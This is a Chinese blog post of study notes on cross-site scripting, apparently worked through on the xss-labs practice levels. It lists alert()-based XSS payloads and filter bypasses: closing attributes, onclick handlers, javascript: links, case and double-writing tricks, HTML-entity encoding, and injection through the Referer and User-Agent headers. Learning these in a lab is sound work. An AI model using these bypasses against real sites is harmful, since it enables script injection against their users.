XSS总结

cc啊昂昂

已于 2022-04-13 18:35:02 修改

阅读量257

点赞数

分类专栏：笔记 # 渗透文章标签： xss xss-labs 信息安全

于 2021-03-12 16:26:37 首次发布

本文链接：https://blog.csdn.net/qq_45735611/article/details/114624811

版权

笔记同时被 2 个专栏收录

32 篇文章 1 订阅

订阅专栏

渗透

23 篇文章 2 订阅

订阅专栏

Xss总结

- 思路总结

思路总结

当服务器未对输入值做任何过滤原样echo

在这里插入图片描述
直接令payload等于<script> alert()</script>即可生效

另外一种暴力的方法是直接在控制台输入代码调用

当页面保留输入值时

在这里插入图片描述

此时可以通过构造">提前闭合input语句，然后接上自己的脚本

payload："><script> alert()</script>

网页实际运行代码：

<input name=keyword  value="">
<script> alert()</script>
">

当遇到对payload实体转换时

htmlspecialchars — 将特殊字符转换为 HTML 实体
在这里插入图片描述
在htmlspecialchars函数中，默认情况是只转换双引号

此时观察源代码，发现input的value是通过单引号闭合的，但单引号没有被转换，因此可以提前闭合value,再给input添加动作，使当鼠标单击input输入框时alert

payload：' οnclick=alert() '

网页实际运行代码：
<input name=keyword  value='' onclick=alert() ''>

当服务器对payload进行尖括号替换时

在这里插入图片描述
观察源代码，发现input的value可以提前闭合。

payload:" οnclick=alert() "

实际运行代码：
<input name=keyword  value="" onclick=alert() "">

当服务器对payload进行关键字替换时

使用更加生僻的关键字或者使用unicode编码

script，on事件过滤

在这里插入图片描述
这里发现全部小写了，将事件全部pass掉，还过滤了script标签，只能使用javascript伪协议

payload:"><a href=javascript:alert(/xss/)>

实际运行代码：
<input name=keyword  value="">
<a href=javascript:alert(/xss/)>
">

src data href 过滤

在这里插入图片描述
这里虽然过滤了大部分标签，但是这里没有做小写转换
直接大写绕过

payload:" Onclick=alert() "

实际运行代码：
<input name=keyword  value="" Onclick=alert() "">

在这里插入图片描述
这里过滤了大部分的标签，还进行了小写转换，但是replace替换后的是空字符，所以可以双写绕过。

payload:" oonnclick=alert() "

实际运行代码：
<input n
ame=keyword  value="" onclick=alert() "">

在这里插入图片描述
这里的规则更加严格了，replace替换后的不再是空字符，替换了双引号，进行了小写转换寻找paylaod输出点，发现是a标签，思路使用javascript

过滤比较严格，但HTML允许使用 Unicode 码点表示字符，浏览器会自动将码点转成对应的字符。
将payload编码后输入

payload:
javascript:alert()

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

payload必须包含关键词

在这里插入图片描述
这里在刚刚的基础上还增加了一个判断，需要在输入字符中包含http://,同样使用unicode编码并在里面插入htpp：//字符

payload:
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;http://&#39;&#41;

<a href="javascript:alert('http://')">;

对空格和斜杠替换时

在这里插入图片描述
这里把空格和/替换成了空格实体，则使用非闭合标签img，空格可以使用回车和换行,TAB代替。

payload:
<input%0Dtype="text"%0Aonclick=alert()>

当输入字段属性被隐藏时

在这里插入图片描述
这里设置input为隐藏，

payload： " οnclick=alert() type="text"

当payload不从浏览器获取时

refere 字段–$_SERVER[‘HTTP_REFERER’];

在这里插入图片描述
这里的注入点在http referer里，HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer，告诉服务器该网页是从哪个页面链接过来的，服务器因此可以获得一些信息用于处理。这里通过BP改包
在这里插入图片描述

payload:
Referer: 22 " οnclick=alert() type="text"

user agent字段–$_SERVER[‘HTTP_USER_AGENT’];

在这里插入图片描述

payload：
User-Agent: " οnclick=alert() type="text"

html文件ng-include

echo '<body><span class="ng-include:'level10.php?t_sort=" οnclick=alert(/xss/) type="text"><"></span></body>';

cc啊昂昂

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
XSS总结

Xss总结思路总结当服务器未对输入值做任何过滤原样echo当页面保留输入值时当遇到对payload实体转换时当服务器对payload进行尖括号替换时当服务器对payload进行关键字替换时script，on事件过滤src data href 过滤payload必须包含关键词对空格和斜杠替换时当输入字段属性被隐藏时当payload不从浏览器获取时refere 字段--$_SERVER['HTTP_REFERER'];user agent字段--$_SERVER['HTTP_USER_AGENT'];html文
复制链接

扫一扫